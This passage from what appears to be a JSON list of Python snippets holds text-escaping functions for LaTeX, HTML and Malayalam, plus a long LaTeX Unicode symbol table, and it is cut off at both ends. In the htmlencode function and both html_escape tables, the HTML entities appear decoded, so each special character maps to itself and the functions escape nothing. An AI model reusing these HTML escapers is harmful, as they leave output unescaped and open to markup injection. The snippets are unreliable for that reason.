self.babel.quote_quotes(text)\n text = text.replace(\"_\", '{\\\\_}')\n for char in separate_chars * 2:\n # Do it twice (\"* 2\") becaues otherwise we would replace\n # \"---\" by \"-{}--\".\n text = text.replace(char + char, char + '{}' + char)\n if self.insert_newline or self.literal_block:\n # Insert a blank before the newline, to avoid\n # ! LaTeX Error: There's no line here to end.\n text = text.replace(\"\\n\", '~\\\\\\\\\\n')\n elif self.mbox_newline:\n if self.literal_block:\n closings = \"}\" * len(self.literal_block_stack)\n openings = \"\".join(self.literal_block_stack)\n else:\n closings = \"\"\n openings = \"\"\n text = text.replace(\"\\n\", \"%s}\\\\\\\\\\n\\\\mbox{%s\" % (closings,openings))\n # lines starting with \"[\" give errors.\n text = text.replace('[', '{[}')\n if self.insert_none_breaking_blanks:\n text = text.replace(' ', '~')\n if self.latex_encoding != 'utf8':\n text = self.unicode_to_latex(text)\n return text",
"def htmlencode(s):\n \ts = s.replace(\"&\", \"&\")\n\ts = s.replace(\"<\", \"<\")\n\ts = s.replace(\">\", \">\")\n\ts = s.replace(\"\\\"\",\""\")\n\ts = s.replace(\"'\", \"'\")\n\treturn s",
"def html_escape(text): \n html_escape_table = {\n \"&\": \"&\",\n '\"': \""\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n return \"\".join(html_escape_table.get(c,c) for c in text)",
"def replace_special_characters_in_list(self, full_list):\n return [n.replace(':','%3A') for n in full_list]",
"def test_escape(self):\n bad_str = '''`~!@#$%^&*()_+-={}[]|\\\\;:'\",./<>?\\n\\r\\t '''\n self.run_escape_case(bad_str)",
"def singleencode(self, word):\n replace = {u'\\u0d15\\u0d4d\\u200d': u'\\u0d7f',\n u'\\u0d23\\u0d4d\\u200d': u'\\u0d7a',\n u'\\u0d28\\u0d4d\\u200d': u'\\u0d7b',\n u'\\u0d30\\u0d4d\\u200d': u'\\u0d7c',\n u'\\u0d32\\u0d4d\\u200d': u'\\u0d7d',\n u'\\u0d33\\u0d4d\\u200d': u'\\u0d7e'}\n for character in replace:\n word = word.replace(character, replace[character])\n return word",
"def replace_char(text):\n\n for ch in ['/', '`', '*', '{', '}', '[', ']', '(', ')', '#', '+', '-', '.', '!', '\\$', ':', '|']:\n text = text.replace(ch, \"_\")\n return text",
"def html_escape(text):\n L=[]\n for c in text:\n L.append(html_escape_table.get(c,c))\n return \"\".join(L)",
"def escape_latex_characters(line):\n line = line.replace('\\\\', '\\\\textbackslash')\n line = line.replace('&', '\\&')\n line = line.replace('%', '\\%')\n line = line.replace('$', '\\$')\n line = line.replace('#', '\\#')\n line = line.replace('_', '\\_')\n line = line.replace('{', '\\{')\n line = line.replace('}', '\\}')\n line = line.replace('~', '\\\\textasciitilde')\n line = line.replace('^', '\\\\textasciicircum')\n line = line.replace('<', '\\\\textless')\n line = line.replace('>', '\\\\textgreater')\n return line",
"def _hidden_in_unicode(self, txt):",
"def quotemeta(text):\n return re.sub(\"(\\W)\", r\"\\\\\\1\", text)",
"def _replace_non_alnum(self):\n no_punct = [x if x.isalnum() else ' ' for x in self._phrase.lower()]\n return ''.join(no_punct) # Convert an array of char to string",
"def encode(string):\n return string.translate(html_entities)",
"def escape_string(text):\n return escape(text)",
"def escape_django_tags(txt):\n for source, dest in ENTITIES.iteritems():\n txt = txt.replace(source, dest)\n return txt",
"def replace_escaped_characters(data: Text) -> Text:\n return re.sub(r'\\\\(.)', r'\\1', data)",
"def _escape_backticks(text: str, escape_with='\\u200b'):\r\n return text.replace('`', '`'+escape_with)",
"def unicode_escape(unistr):\n import htmlentitydefs\n escaped = \"\"\n\n for char in unistr:\n if ord(char) in htmlentitydefs.codepoint2name:\n name = htmlentitydefs.codepoint2name.get(ord(char))\n entity = htmlentitydefs.name2codepoint.get(name)\n escaped +=\"&#\" + str(entity)\n\n else:\n escaped += char\n\n return escaped",
"def register_all(self):\n # TODO complete this list\n # register special symbols\n self.register(u'\\n\\n', u' \\\\par', encode=False)\n self.register(u'\\n\\n', u'\\\\par', encode=False)\n self.register(u' ', u'\\\\ ', encode=False)\n self.register(u'\\N{EM SPACE}', u'\\\\quad')\n self.register(u'\\N{THIN SPACE}', u' ', decode=False)\n self.register(u'%', u'\\\\%')\n self.register(u'\\N{EN DASH}', u'--')\n self.register(u'\\N{EN DASH}', u'\\\\textendash')\n self.register(u'\\N{EM DASH}', u'---')\n self.register(u'\\N{EM DASH}', u'\\\\textemdash')\n self.register(u'\\N{REPLACEMENT CHARACTER}', u\"????\", decode=False)\n self.register(u'\\N{LEFT SINGLE QUOTATION MARK}', u'`', decode=False)\n self.register(u'\\N{RIGHT SINGLE QUOTATION MARK}', u\"'\", decode=False)\n self.register(u'\\N{LEFT DOUBLE QUOTATION MARK}', u'``')\n self.register(u'\\N{RIGHT DOUBLE QUOTATION MARK}', u\"''\")\n self.register(u'\\N{DOUBLE LOW-9 QUOTATION MARK}', u\",,\")\n self.register(u'\\N{DOUBLE LOW-9 QUOTATION MARK}', u'\\\\glqq',\n encode=False)\n self.register(u'\\N{LEFT-POINTING DOUBLE ANGLE QUOTATION MARK}',\n u'\\\\guillemotleft')\n self.register(u'\\N{RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK}',\n u'\\\\guillemotright')\n self.register(u'\\N{MODIFIER LETTER PRIME}', u\"'\", decode=False)\n self.register(u'\\N{MODIFIER LETTER DOUBLE PRIME}', u\"''\", decode=False)\n self.register(u'\\N{MODIFIER LETTER TURNED COMMA}', u'`', decode=False)\n self.register(u'\\N{MODIFIER LETTER APOSTROPHE}', u\"'\", decode=False)\n self.register(u'\\N{MODIFIER LETTER REVERSED COMMA}', u'`',\n decode=False)\n self.register(u'\\N{DAGGER}', u'\\\\dag')\n self.register(u'\\N{DOUBLE DAGGER}', u'\\\\ddag')\n\n self.register(u'\\\\', u'\\\\textbackslash', encode=False)\n self.register(u'\\\\', u'\\\\backslash', mode='math', encode=False)\n\n self.register(u'\\N{TILDE OPERATOR}', u'\\\\sim', mode='math')\n self.register(u'\\N{MODIFIER LETTER LOW TILDE}',\n u'\\\\texttildelow', package='textcomp')\n self.register(u'\\N{SMALL TILDE}', u'\\\\~{}')\n self.register(u'~', u'\\\\textasciitilde')\n\n self.register(u'\\N{BULLET}', u'\\\\bullet', mode='math')\n self.register(u'\\N{BULLET}', u'\\\\textbullet', package='textcomp')\n self.register(u'\\N{ASTERISK OPERATOR}', u'\\\\ast', mode='math')\n\n self.register(u'\\N{NUMBER SIGN}', u'\\\\#')\n self.register(u'\\N{LOW LINE}', u'\\\\_')\n self.register(u'\\N{AMPERSAND}', u'\\\\&')\n self.register(u'\\N{NO-BREAK SPACE}', u'~')\n self.register(u'\\N{INVERTED EXCLAMATION MARK}', u'!`')\n self.register(u'\\N{CENT SIGN}', u'\\\\not{c}')\n\n self.register(u'\\N{POUND SIGN}', u'\\\\pounds')\n self.register(u'\\N{POUND SIGN}', u'\\\\textsterling', package='textcomp')\n self.register(u'\\N{YEN SIGN}', u'\\\\yen')\n self.register(u'\\N{YEN SIGN}', u'\\\\textyen', package='textcomp')\n\n self.register(u'\\N{SECTION SIGN}', u'\\\\S')\n self.register(u'\\N{DIAERESIS}', u'\\\\\"{}')\n self.register(u'\\N{NOT SIGN}', u'\\\\neg')\n self.register(u'\\N{HYPHEN}', u'-', decode=False)\n self.register(u'\\N{SOFT HYPHEN}', u'\\\\-')\n self.register(u'\\N{MACRON}', u'\\\\={}')\n\n self.register(u'\\N{DEGREE SIGN}', u'^\\\\circ', mode='math')\n self.register(u'\\N{DEGREE SIGN}', u'\\\\textdegree', package='textcomp')\n\n self.register(u'\\N{MINUS SIGN}', u'-', mode='math')\n self.register(u'\\N{PLUS-MINUS SIGN}', u'\\\\pm', mode='math')\n self.register(u'\\N{PLUS-MINUS SIGN}', u'\\\\textpm', package='textcomp')\n\n self.register(u'\\N{SUPERSCRIPT TWO}', u'^2', mode='math')\n self.register(\n u'\\N{SUPERSCRIPT TWO}',\n 
u'\\\\texttwosuperior',\n package='textcomp')\n\n self.register(u'\\N{SUPERSCRIPT THREE}', u'^3', mode='math')\n self.register(\n u'\\N{SUPERSCRIPT THREE}',\n u'\\\\textthreesuperior',\n package='textcomp')\n\n self.register(u'\\N{ACUTE ACCENT}', u\"\\\\'{}\")\n\n self.register(u'\\N{MICRO SIGN}', u'\\\\mu', mode='math')\n self.register(u'\\N{MICRO SIGN}', u'\\\\micro', package='gensymu')\n\n self.register(u'\\N{PILCROW SIGN}', u'\\\\P')\n\n self.register(u'\\N{MIDDLE DOT}', u'\\\\cdot', mode='math')\n self.register(\n u'\\N{MIDDLE DOT}',\n u'\\\\textperiodcentered',\n package='textcomp')\n\n self.register(u'\\N{CEDILLA}', u'\\\\c{}')\n\n self.register(u'\\N{SUPERSCRIPT ONE}', u'^1', mode='math')\n self.register(\n u'\\N{SUPERSCRIPT ONE}',\n u'\\\\textonesuperior',\n package='textcomp')\n\n self.register(u'\\N{INVERTED QUESTION MARK}', u'?`')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH GRAVE}', u'\\\\`A')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH CIRCUMFLEX}', u'\\\\^A')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH TILDE}', u'\\\\~A')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH DIAERESIS}', u'\\\\\"A')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH RING ABOVE}', u'\\\\AA')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH RING ABOVE}', u'\\\\r A',\n encode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER AE}', u'\\\\AE')\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH CEDILLA}', u'\\\\c C')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH GRAVE}', u'\\\\`E')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH ACUTE}', u\"\\\\'E\")\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH CIRCUMFLEX}', u'\\\\^E')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH DIAERESIS}', u'\\\\\"E')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH GRAVE}', u'\\\\`I')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH CIRCUMFLEX}', u'\\\\^I')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH DIAERESIS}', u'\\\\\"I')\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH TILDE}', u'\\\\~N')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH GRAVE}', u'\\\\`O')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH ACUTE}', u\"\\\\'O\")\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH CIRCUMFLEX}', u'\\\\^O')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH TILDE}', u'\\\\~O')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH DIAERESIS}', u'\\\\\"O')\n self.register(u'\\N{MULTIPLICATION SIGN}', u'\\\\times', mode='math')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH STROKE}', u'\\\\O')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH GRAVE}', u'\\\\`U')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH ACUTE}', u\"\\\\'U\")\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH CIRCUMFLEX}', u'\\\\^U')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH DIAERESIS}', u'\\\\\"U')\n self.register(u'\\N{LATIN CAPITAL LETTER Y WITH ACUTE}', u\"\\\\'Y\")\n self.register(u'\\N{LATIN SMALL LETTER SHARP S}', u'\\\\ss')\n self.register(u'\\N{LATIN SMALL LETTER A WITH GRAVE}', u'\\\\`a')\n self.register(u'\\N{LATIN SMALL LETTER A WITH ACUTE}', u\"\\\\'a\")\n self.register(u'\\N{LATIN SMALL LETTER A WITH CIRCUMFLEX}', u'\\\\^a')\n self.register(u'\\N{LATIN SMALL LETTER A WITH TILDE}', u'\\\\~a')\n self.register(u'\\N{LATIN SMALL LETTER A WITH DIAERESIS}', u'\\\\\"a')\n self.register(u'\\N{LATIN SMALL LETTER A WITH RING ABOVE}', u'\\\\aa')\n self.register(u'\\N{LATIN SMALL LETTER A WITH RING ABOVE}', u'\\\\r a',\n encode=False)\n self.register(u'\\N{LATIN SMALL LETTER AE}', u'\\\\ae')\n 
self.register(u'\\N{LATIN SMALL LETTER C WITH CEDILLA}', u'\\\\c c')\n self.register(u'\\N{LATIN SMALL LETTER E WITH GRAVE}', u'\\\\`e')\n self.register(u'\\N{LATIN SMALL LETTER E WITH ACUTE}', u\"\\\\'e\")\n self.register(u'\\N{LATIN SMALL LETTER E WITH CIRCUMFLEX}', u'\\\\^e')\n self.register(u'\\N{LATIN SMALL LETTER E WITH DIAERESIS}', u'\\\\\"e')\n self.register(u'\\N{LATIN SMALL LETTER I WITH GRAVE}', u'\\\\`\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH GRAVE}', u'\\\\`i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH ACUTE}', u\"\\\\'\\\\i\")\n self.register(u'\\N{LATIN SMALL LETTER I WITH ACUTE}', u\"\\\\'i\")\n self.register(u'\\N{LATIN SMALL LETTER I WITH CIRCUMFLEX}', u'\\\\^\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH CIRCUMFLEX}', u'\\\\^i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH DIAERESIS}', u'\\\\\"\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH DIAERESIS}', u'\\\\\"i')\n self.register(u'\\N{LATIN SMALL LETTER N WITH TILDE}', u'\\\\~n')\n self.register(u'\\N{LATIN SMALL LETTER O WITH GRAVE}', u'\\\\`o')\n self.register(u'\\N{LATIN SMALL LETTER O WITH ACUTE}', u\"\\\\'o\")\n self.register(u'\\N{LATIN SMALL LETTER O WITH CIRCUMFLEX}', u'\\\\^o')\n self.register(u'\\N{LATIN SMALL LETTER O WITH TILDE}', u'\\\\~o')\n self.register(u'\\N{LATIN SMALL LETTER O WITH DIAERESIS}', u'\\\\\"o')\n self.register(u'\\N{DIVISION SIGN}', u'\\\\div', mode='math')\n self.register(u'\\N{LATIN SMALL LETTER O WITH STROKE}', u'\\\\o')\n self.register(u'\\N{LATIN SMALL LETTER U WITH GRAVE}', u'\\\\`u')\n self.register(u'\\N{LATIN SMALL LETTER U WITH ACUTE}', u\"\\\\'u\")\n self.register(u'\\N{LATIN SMALL LETTER U WITH CIRCUMFLEX}', u'\\\\^u')\n self.register(u'\\N{LATIN SMALL LETTER U WITH DIAERESIS}', u'\\\\\"u')\n self.register(u'\\N{LATIN SMALL LETTER Y WITH ACUTE}', u\"\\\\'y\")\n self.register(u'\\N{LATIN SMALL LETTER Y WITH DIAERESIS}', u'\\\\\"y')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH MACRON}', u'\\\\=A')\n self.register(u'\\N{LATIN SMALL LETTER A WITH MACRON}', u'\\\\=a')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH BREVE}', u'\\\\u A')\n self.register(u'\\N{LATIN SMALL LETTER A WITH BREVE}', u'\\\\u a')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH OGONEK}', u'\\\\k A')\n self.register(u'\\N{LATIN SMALL LETTER A WITH OGONEK}', u'\\\\k a')\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH ACUTE}', u\"\\\\'C\")\n self.register(u'\\N{LATIN SMALL LETTER C WITH ACUTE}', u\"\\\\'c\")\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH CIRCUMFLEX}', u'\\\\^C')\n self.register(u'\\N{LATIN SMALL LETTER C WITH CIRCUMFLEX}', u'\\\\^c')\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH DOT ABOVE}', u'\\\\.C')\n self.register(u'\\N{LATIN SMALL LETTER C WITH DOT ABOVE}', u'\\\\.c')\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH CARON}', u'\\\\v C')\n self.register(u'\\N{LATIN SMALL LETTER C WITH CARON}', u'\\\\v c')\n self.register(u'\\N{LATIN CAPITAL LETTER D WITH CARON}', u'\\\\v D')\n self.register(u'\\N{LATIN SMALL LETTER D WITH CARON}', u'\\\\v d')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH MACRON}', u'\\\\=E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH MACRON}', u'\\\\=e')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH BREVE}', u'\\\\u E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH BREVE}', u'\\\\u e')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH DOT ABOVE}', u'\\\\.E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH DOT ABOVE}', u'\\\\.e')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH OGONEK}', u'\\\\k E')\n 
self.register(u'\\N{LATIN SMALL LETTER E WITH OGONEK}', u'\\\\k e')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH CARON}', u'\\\\v E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH CARON}', u'\\\\v e')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH CIRCUMFLEX}', u'\\\\^G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH CIRCUMFLEX}', u'\\\\^g')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH BREVE}', u'\\\\u G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH BREVE}', u'\\\\u g')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH DOT ABOVE}', u'\\\\.G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH DOT ABOVE}', u'\\\\.g')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH CEDILLA}', u'\\\\c G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH CEDILLA}', u'\\\\c g')\n self.register(u'\\N{LATIN CAPITAL LETTER H WITH CIRCUMFLEX}', u'\\\\^H')\n self.register(u'\\N{LATIN SMALL LETTER H WITH CIRCUMFLEX}', u'\\\\^h')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH TILDE}', u'\\\\~I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH TILDE}', u'\\\\~\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH TILDE}', u'\\\\~i')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH MACRON}', u'\\\\=I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH MACRON}', u'\\\\=\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH MACRON}', u'\\\\=i')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH BREVE}', u'\\\\u I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH BREVE}', u'\\\\u\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH BREVE}', u'\\\\u i')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH OGONEK}', u'\\\\k I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH OGONEK}', u'\\\\k i')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH DOT ABOVE}', u'\\\\.I')\n self.register(u'\\N{LATIN SMALL LETTER DOTLESS I}', u'\\\\i')\n self.register(u'\\N{LATIN CAPITAL LIGATURE IJ}', u'IJ', decode=False)\n self.register(u'\\N{LATIN SMALL LIGATURE IJ}', u'ij', decode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER J WITH CIRCUMFLEX}', u'\\\\^J')\n self.register(u'\\N{LATIN SMALL LETTER J WITH CIRCUMFLEX}', u'\\\\^\\\\j')\n self.register(u'\\N{LATIN SMALL LETTER J WITH CIRCUMFLEX}', u'\\\\^j')\n self.register(u'\\N{LATIN CAPITAL LETTER K WITH CEDILLA}', u'\\\\c K')\n self.register(u'\\N{LATIN SMALL LETTER K WITH CEDILLA}', u'\\\\c k')\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH ACUTE}', u\"\\\\'L\")\n self.register(u'\\N{LATIN SMALL LETTER L WITH ACUTE}', u\"\\\\'l\")\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH CEDILLA}', u'\\\\c L')\n self.register(u'\\N{LATIN SMALL LETTER L WITH CEDILLA}', u'\\\\c l')\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH CARON}', u'\\\\v L')\n self.register(u'\\N{LATIN SMALL LETTER L WITH CARON}', u'\\\\v l')\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH STROKE}', u'\\\\L')\n self.register(u'\\N{LATIN SMALL LETTER L WITH STROKE}', u'\\\\l')\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH ACUTE}', u\"\\\\'N\")\n self.register(u'\\N{LATIN SMALL LETTER N WITH ACUTE}', u\"\\\\'n\")\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH CEDILLA}', u'\\\\c N')\n self.register(u'\\N{LATIN SMALL LETTER N WITH CEDILLA}', u'\\\\c n')\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH CARON}', u'\\\\v N')\n self.register(u'\\N{LATIN SMALL LETTER N WITH CARON}', u'\\\\v n')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH MACRON}', u'\\\\=O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH MACRON}', u'\\\\=o')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH BREVE}', 
u'\\\\u O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH BREVE}', u'\\\\u o')\n self.register(\n u'\\N{LATIN CAPITAL LETTER O WITH DOUBLE ACUTE}',\n u'\\\\H O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH DOUBLE ACUTE}', u'\\\\H o')\n self.register(u'\\N{LATIN CAPITAL LIGATURE OE}', u'\\\\OE')\n self.register(u'\\N{LATIN SMALL LIGATURE OE}', u'\\\\oe')\n self.register(u'\\N{LATIN CAPITAL LETTER R WITH ACUTE}', u\"\\\\'R\")\n self.register(u'\\N{LATIN SMALL LETTER R WITH ACUTE}', u\"\\\\'r\")\n self.register(u'\\N{LATIN CAPITAL LETTER R WITH CEDILLA}', u'\\\\c R')\n self.register(u'\\N{LATIN SMALL LETTER R WITH CEDILLA}', u'\\\\c r')\n self.register(u'\\N{LATIN CAPITAL LETTER R WITH CARON}', u'\\\\v R')\n self.register(u'\\N{LATIN SMALL LETTER R WITH CARON}', u'\\\\v r')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH ACUTE}', u\"\\\\'S\")\n self.register(u'\\N{LATIN SMALL LETTER S WITH ACUTE}', u\"\\\\'s\")\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH CIRCUMFLEX}', u'\\\\^S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH CIRCUMFLEX}', u'\\\\^s')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH CEDILLA}', u'\\\\c S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH CEDILLA}', u'\\\\c s')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH CARON}', u'\\\\v S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH CARON}', u'\\\\v s')\n self.register(u'\\N{LATIN CAPITAL LETTER T WITH CEDILLA}', u'\\\\c T')\n self.register(u'\\N{LATIN SMALL LETTER T WITH CEDILLA}', u'\\\\c t')\n self.register(u'\\N{LATIN CAPITAL LETTER T WITH CARON}', u'\\\\v T')\n self.register(u'\\N{LATIN SMALL LETTER T WITH CARON}', u'\\\\v t')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH TILDE}', u'\\\\~U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH TILDE}', u'\\\\~u')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH MACRON}', u'\\\\=U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH MACRON}', u'\\\\=u')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH BREVE}', u'\\\\u U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH BREVE}', u'\\\\u u')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH RING ABOVE}', u'\\\\r U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH RING ABOVE}', u'\\\\r u')\n self.register(\n u'\\N{LATIN CAPITAL LETTER U WITH DOUBLE ACUTE}',\n u'\\\\H U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH DOUBLE ACUTE}', u'\\\\H u')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH OGONEK}', u'\\\\k U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH OGONEK}', u'\\\\k u')\n self.register(u'\\N{LATIN CAPITAL LETTER W WITH CIRCUMFLEX}', u'\\\\^W')\n self.register(u'\\N{LATIN SMALL LETTER W WITH CIRCUMFLEX}', u'\\\\^w')\n self.register(u'\\N{LATIN CAPITAL LETTER Y WITH CIRCUMFLEX}', u'\\\\^Y')\n self.register(u'\\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}', u'\\\\^y')\n self.register(u'\\N{LATIN CAPITAL LETTER Y WITH DIAERESIS}', u'\\\\\"Y')\n self.register(u'\\N{LATIN CAPITAL LETTER Z WITH ACUTE}', u\"\\\\'Z\")\n self.register(u'\\N{LATIN SMALL LETTER Z WITH ACUTE}', u\"\\\\'z\")\n self.register(u'\\N{LATIN CAPITAL LETTER Z WITH DOT ABOVE}', u'\\\\.Z')\n self.register(u'\\N{LATIN SMALL LETTER Z WITH DOT ABOVE}', u'\\\\.z')\n self.register(u'\\N{LATIN CAPITAL LETTER Z WITH CARON}', u'\\\\v Z')\n self.register(u'\\N{LATIN SMALL LETTER Z WITH CARON}', u'\\\\v z')\n self.register(u'\\N{LATIN CAPITAL LETTER DZ WITH CARON}', u'D\\\\v Z')\n self.register(\n u'\\N{LATIN CAPITAL LETTER D WITH SMALL LETTER Z WITH CARON}',\n u'D\\\\v z')\n self.register(u'\\N{LATIN SMALL LETTER DZ WITH CARON}', u'd\\\\v 
z')\n self.register(u'\\N{LATIN CAPITAL LETTER LJ}', u'LJ', decode=False)\n self.register(\n u'\\N{LATIN CAPITAL LETTER L WITH SMALL LETTER J}',\n u'Lj',\n decode=False)\n self.register(u'\\N{LATIN SMALL LETTER LJ}', u'lj', decode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER NJ}', u'NJ', decode=False)\n self.register(\n u'\\N{LATIN CAPITAL LETTER N WITH SMALL LETTER J}',\n u'Nj',\n decode=False)\n self.register(u'\\N{LATIN SMALL LETTER NJ}', u'nj', decode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH CARON}', u'\\\\v A')\n self.register(u'\\N{LATIN SMALL LETTER A WITH CARON}', u'\\\\v a')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH CARON}', u'\\\\v I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH CARON}', u'\\\\v\\\\i')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH CARON}', u'\\\\v O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH CARON}', u'\\\\v o')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH CARON}', u'\\\\v U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH CARON}', u'\\\\v u')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH CARON}', u'\\\\v G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH CARON}', u'\\\\v g')\n self.register(u'\\N{LATIN CAPITAL LETTER K WITH CARON}', u'\\\\v K')\n self.register(u'\\N{LATIN SMALL LETTER K WITH CARON}', u'\\\\v k')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH OGONEK}', u'\\\\k O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH OGONEK}', u'\\\\k o')\n self.register(u'\\N{LATIN SMALL LETTER J WITH CARON}', u'\\\\v\\\\j')\n self.register(u'\\N{LATIN CAPITAL LETTER DZ}', u'DZ', decode=False)\n self.register(\n u'\\N{LATIN CAPITAL LETTER D WITH SMALL LETTER Z}',\n u'Dz',\n decode=False)\n self.register(u'\\N{LATIN SMALL LETTER DZ}', u'dz', decode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH ACUTE}', u\"\\\\'G\")\n self.register(u'\\N{LATIN SMALL LETTER G WITH ACUTE}', u\"\\\\'g\")\n self.register(u'\\N{LATIN CAPITAL LETTER AE WITH ACUTE}', u\"\\\\'\\\\AE\")\n self.register(u'\\N{LATIN SMALL LETTER AE WITH ACUTE}', u\"\\\\'\\\\ae\")\n self.register(\n u'\\N{LATIN CAPITAL LETTER O WITH STROKE AND ACUTE}',\n u\"\\\\'\\\\O\")\n self.register(\n u'\\N{LATIN SMALL LETTER O WITH STROKE AND ACUTE}',\n u\"\\\\'\\\\o\")\n self.register(u'\\N{LATIN CAPITAL LETTER ETH}', u'\\\\DH')\n self.register(u'\\N{LATIN SMALL LETTER ETH}', u'\\\\dh')\n self.register(u'\\N{LATIN CAPITAL LETTER THORN}', u'\\\\TH')\n self.register(u'\\N{LATIN SMALL LETTER THORN}', u'\\\\th')\n self.register(u'\\N{LATIN CAPITAL LETTER D WITH STROKE}', u'\\\\DJ')\n self.register(u'\\N{LATIN SMALL LETTER D WITH STROKE}', u'\\\\dj')\n self.register(u'\\N{LATIN CAPITAL LETTER D WITH DOT BELOW}', u'\\\\d D')\n self.register(u'\\N{LATIN SMALL LETTER D WITH DOT BELOW}', u'\\\\d d')\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH DOT BELOW}', u'\\\\d L')\n self.register(u'\\N{LATIN SMALL LETTER L WITH DOT BELOW}', u'\\\\d l')\n self.register(u'\\N{LATIN CAPITAL 